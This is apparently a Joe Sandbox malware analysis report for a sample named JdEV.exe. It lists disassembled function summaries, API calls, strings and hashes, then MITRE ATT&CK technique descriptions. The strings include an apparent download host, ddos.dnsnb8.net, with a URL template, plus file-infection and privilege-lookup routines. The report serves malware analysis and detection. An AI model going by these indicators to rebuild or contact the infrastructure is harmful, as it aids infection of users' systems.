Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG4$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-2137254892
Opcode ID: 0016f70ff50e46ee8622ae8629e9054c9793e66daff99e83be957dd83d5eb5e7
Instruction ID: feca003dec1ca9a8f45fcd0d8ec25f6699dad3859804849332ff0d338937fb03
Opcode Fuzzy Hash: 0016f70ff50e46ee8622ae8629e9054c9793e66daff99e83be957dd83d5eb5e7
Instruction Fuzzy Hash: 27218E79900608BADB22DBA0DC48BAEBBFCAB16315F1141A5E505AB050DB74BB84DF60

Function 00341718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\JdEV.exe), ref: 00341729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0034174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0034177C
__aulldiv.LIBCMT ref: 00341796
__aulldiv.LIBCMT ref: 003417A8

Strings

Time, xrefs: 0034173D, 00341766
C:\Users\user\AppData\Local\Temp\JdEV.exe, xrefs: 00341722
SOFTWARE\GTplus, xrefs: 00341742, 0034176B

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\JdEV.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-762845633
Opcode ID: f64df289e593907332e4e6402e48afb378015a43d1e2c5d2326b1e53b53dd957
Instruction ID: abf924ad6d72d1d4aa2f1f4ff5b8fe014788c5eb2c90b43f8239b3cffed6e0a8
Opcode Fuzzy Hash: f64df289e593907332e4e6402e48afb378015a43d1e2c5d2326b1e53b53dd957
Instruction Fuzzy Hash: 9D113375A00609BBDB129A94CCC9FEF7FFCEB45B14F108515FA01BF181D671AA848B60

Function 00346076 Relevance: 11.1, APIs: 7, Instructions: 597
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 003460BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003460DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00346189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003461A5

Memory Dump Source

Source File: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: befe38daa446406007b36d3a10d604dd75ec4d6ca2ff8d7c95c6f865a07f8c4c
Instruction ID: f2a2b51b1a770ba3386c2195134c9eaa089ab8abdaf4bdbf8d0dce9e60f87fc0
Opcode Fuzzy Hash: befe38daa446406007b36d3a10d604dd75ec4d6ca2ff8d7c95c6f865a07f8c4c
Instruction Fuzzy Hash: 8F0234B25087859FDB328F24CC46BEA3BE4EF13310F1945ADD8868F692D674B901CB56

Function 00342B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00342BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00342BB4
GetDriveTypeA.KERNEL32(?), ref: 00342BD3
CreateThread.KERNEL32(00000000,00000000,00342B7D,?,00000000,00000000), ref: 00342BEE
lstrlen.KERNEL32(?), ref: 00342BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00342C16
CreateThread.KERNEL32(00000000,00000000,00342845,00000000,00000000,00000000), ref: 00342C3A

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 51f6b7e8a061a14b589348c6a8a384f4367e9b5e6fdb640d3acd9145da4fc681
Instruction ID: 9c978bb304b0e8a1ab12508f4d6d97005c5dd6724f6b5b0320dfd20b96fcce96
Opcode Fuzzy Hash: 51f6b7e8a061a14b589348c6a8a384f4367e9b5e6fdb640d3acd9145da4fc681
Instruction Fuzzy Hash: 4A21D8B580014CAFE7229F64AC84DAF7BADFB05344F560125F942EB151D730AD46CB60

Function 00341E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,003432B0,00000164,00342986,?), ref: 00341EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00341ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00341EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00341F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00341F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0034201E
memset.MSVCRT ref: 003420D8
memset.MSVCRT ref: 003420EA
memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0034222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00342238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0034224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003422C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003422CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003422DD
WriteFile.KERNEL32(000000FF,00344008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003422F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0034230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00342322
UnmapViewOfFile.KERNEL32(?,?,003432B0,00000164,00342986,?), ref: 00342340
CloseHandle.KERNEL32(?,?,003432B0,00000164,00342986,?), ref: 0034234E
CloseHandle.KERNEL32(000000FF,?,003432B0,00000164,00342986,?), ref: 00342359

Strings

m@4, xrefs: 00341E8F, 0034225A
<@4, xrefs: 00342290
.@4, xrefs: 00342274
C@4, xrefs: 0034229E
5@4, xrefs: 00342282

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@4$5@4$<@4$C@4$m@4
API String ID: 3043204753-457535175
Opcode ID: 41bda05a1cac72fece6cd858fc095ecb3d2e0ca889ab0a64eca4a6a622548ae8
Instruction ID: b05e2c09a4686985973d7dcc7a1140e0e5e1089a0323f055062ebf1246059c2f
Opcode Fuzzy Hash: 41bda05a1cac72fece6cd858fc095ecb3d2e0ca889ab0a64eca4a6a622548ae8
Instruction Fuzzy Hash: 0EF12575900608AFCB22DFA4DC81AAEBBF5FF09314F504529E51AAB661DB30AD81CF50

Function 00341973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\N4`N4,00000000,C:\Users\user\AppData\Local\Temp\JdEV.exe), ref: 00341992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003419BA
Sleep.KERNEL32(00000064), ref: 003419C6
wsprintfA.USER32 ref: 003419EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00341A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00341A1E
GetFileSize.KERNEL32(?,00000000), ref: 00341A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00341A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00341A65
CloseHandle.KERNEL32(000000FF), ref: 00341A90
DeleteFileA.KERNEL32(?), ref: 00341AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00341AC1

Strings

%s%.8X.data, xrefs: 003419E6
C:\Users\user\AppData\Local\Temp\JdEV.exe, xrefs: 0034197C
C:\Users\user\AppData\Local\Temp\, xrefs: 003419DB
\N4`N4, xrefs: 00341980

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\JdEV.exe$\N4`N4
API String ID: 716042067-841651916
Opcode ID: f16c821d2f10734eb796ed691029c169d1555f98213a280ed5674320a68b3db7
Instruction ID: 494750a81520f2545a9d3840dcdeba589a8d918a2fa69aae4b4d1c6bcd35f6ec
Opcode Fuzzy Hash: f16c821d2f10734eb796ed691029c169d1555f98213a280ed5674320a68b3db7
Instruction Fuzzy Hash: 5D514D71901619EFCB229F98CC84AAEBBFDFB05354F114569F516EB190D770AE80CB50

Function 003428B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 003428D3
wsprintfA.USER32 ref: 003428F7
memset.MSVCRT ref: 00342925
wsprintfA.USER32 ref: 00342940

Part of subcall function 003429E2: memset.MSVCRT ref: 00342A02
Part of subcall function 003429E2: wsprintfA.USER32 ref: 00342A1A
Part of subcall function 003429E2: memset.MSVCRT ref: 00342A44
Part of subcall function 003429E2: lstrlen.KERNEL32(?), ref: 00342A54
Part of subcall function 003429E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00342A6C
Part of subcall function 003429E2: strrchr.MSVCRT ref: 00342A7C
Part of subcall function 003429E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00342A9F
Part of subcall function 003429E2: lstrlen.KERNEL32(Documents and Settings), ref: 00342AAE
Part of subcall function 003429E2: memset.MSVCRT ref: 00342AC6
Part of subcall function 003429E2: memset.MSVCRT ref: 00342ADA
Part of subcall function 003429E2: FindFirstFileA.KERNEL32(?,?), ref: 00342AEF
Part of subcall function 003429E2: memset.MSVCRT ref: 00342B13

strrchr.MSVCRT ref: 00342959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00342974

Strings

%s\, xrefs: 0034293A
exe, xrefs: 0034296D
%s%s, xrefs: 003428F1
C:\Users\user\AppData\Local\Temp\, xrefs: 003429B3
rar, xrefs: 00342988

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-2519171390
Opcode ID: 7a62eacbf34abf5e908075936c7154866a0030dbe06ae172bd1d2db995f264a2
Instruction ID: e77b1c9869b0b7e08bf3ba63c06e1415196727778aabeb6c126a7db36d4e61bc
Opcode Fuzzy Hash: 7a62eacbf34abf5e908075936c7154866a0030dbe06ae172bd1d2db995f264a2
Instruction Fuzzy Hash: 9031B37694030C6BDB22AB65DC85FDB77EC9B11310F450852F545BF080EBB4BAD48BA0

Function 00341638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0034164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0034165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\JdEV.exe,00000104), ref: 0034166E
CreateThread.KERNEL32(00000000,00000000,00341099,00000000,00000000,00000000), ref: 003416AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 003416BD

Part of subcall function 0034139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\JdEV.exe), ref: 003413BC
Part of subcall function 0034139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003413DA
Part of subcall function 0034139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00341448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\JdEV.exe), ref: 003416E5

Strings

C:\Windows\system32, xrefs: 00341656
Documents and Settings, xrefs: 00341696
C:\Users\user\AppData\Local\Temp\JdEV.exe, xrefs: 00341662, 00341667, 003416DD
C:\Users\user\AppData\Local\Temp\, xrefs: 00341644

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\JdEV.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-2942585238
Opcode ID: 52e81485765f91a35627d120551749e404d6446fd8f1712fca1b51bafff7d04a
Instruction ID: 6f0f92f50abcc92f96898f6fae6bd4598bb096544242fda5c4efa8aef6aed411
Opcode Fuzzy Hash: 52e81485765f91a35627d120551749e404d6446fd8f1712fca1b51bafff7d04a
Instruction Fuzzy Hash: 2B11B9755415147BCB2367A49D4EFDB3EEDEF57361F110121F20A9E060DA74B980CBA1

Function 00341000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG4,http://%s:%d/%s/%s,003410E8,?), ref: 00341018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76078400), ref: 00341029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00341038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0034104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00341075
CloseHandle.KERNEL32(?), ref: 0034108B
CloseHandle.KERNEL32(00000000), ref: 0034108E

Strings

HG4, xrefs: 00341001
ddos.dnsnb8.net, xrefs: 00341026
http://%s:%d/%s/%s, xrefs: 00341000

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HG4$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-2794644801
Opcode ID: af1dc2269f4fb30e9b30037a54ff6a57669a46e84c2b19147f47fa97e168fd62
Instruction ID: 3166e457e6c2c4bf10af9e463e5afaa30940e56b01208f2244c89bf06c8c939f
Opcode Fuzzy Hash: af1dc2269f4fb30e9b30037a54ff6a57669a46e84c2b19147f47fa97e168fd62
Instruction Fuzzy Hash: B30196B510075CBFE7325F609C88E2BBBECEB45799F014629F245AB090DA706E848B71

Function 003414E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00341504
VirtualQuery.KERNEL32(003414E1,?,0000001C), ref: 00341525
ExitProcess.KERNEL32 ref: 0034157A

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 88646c6fbbc275910f99db63b9b83a5d89ea099a346dc44b5343b8a7273f39f8
Instruction ID: 37179e6301ba95283a001cc85ac3b0dfca59d260b54c4a7cf2f93041eaf09864
Opcode Fuzzy Hash: 88646c6fbbc275910f99db63b9b83a5d89ea099a346dc44b5343b8a7273f39f8
Instruction Fuzzy Hash: FE118C79D00614DFCB23DFA6A8817B977ECEB83750F01403AE412DE121DB30B980AB50

Function 00341915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00341933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00341947

Memory Dump Source

Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true

Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_340000_JdEV.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: d2f0ee894e2422bc9189d36ae5088c9ac0ba12959b7e9ad192ee108aec6415bb
Instruction ID: cc4d8639d67bca3fd62f75b484dc91791133da14b563fff92ffd18b152c7c96d
Opcode Fuzzy Hash: d2f0ee894e2422bc9189d36ae5088c9ac0ba12959b7e9ad192ee108aec6415bb
Instruction Fuzzy Hash: FCF06836210609ABD722DE26DC04BAB77ECEB51361F118536F516DA460E730F685DBF0

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

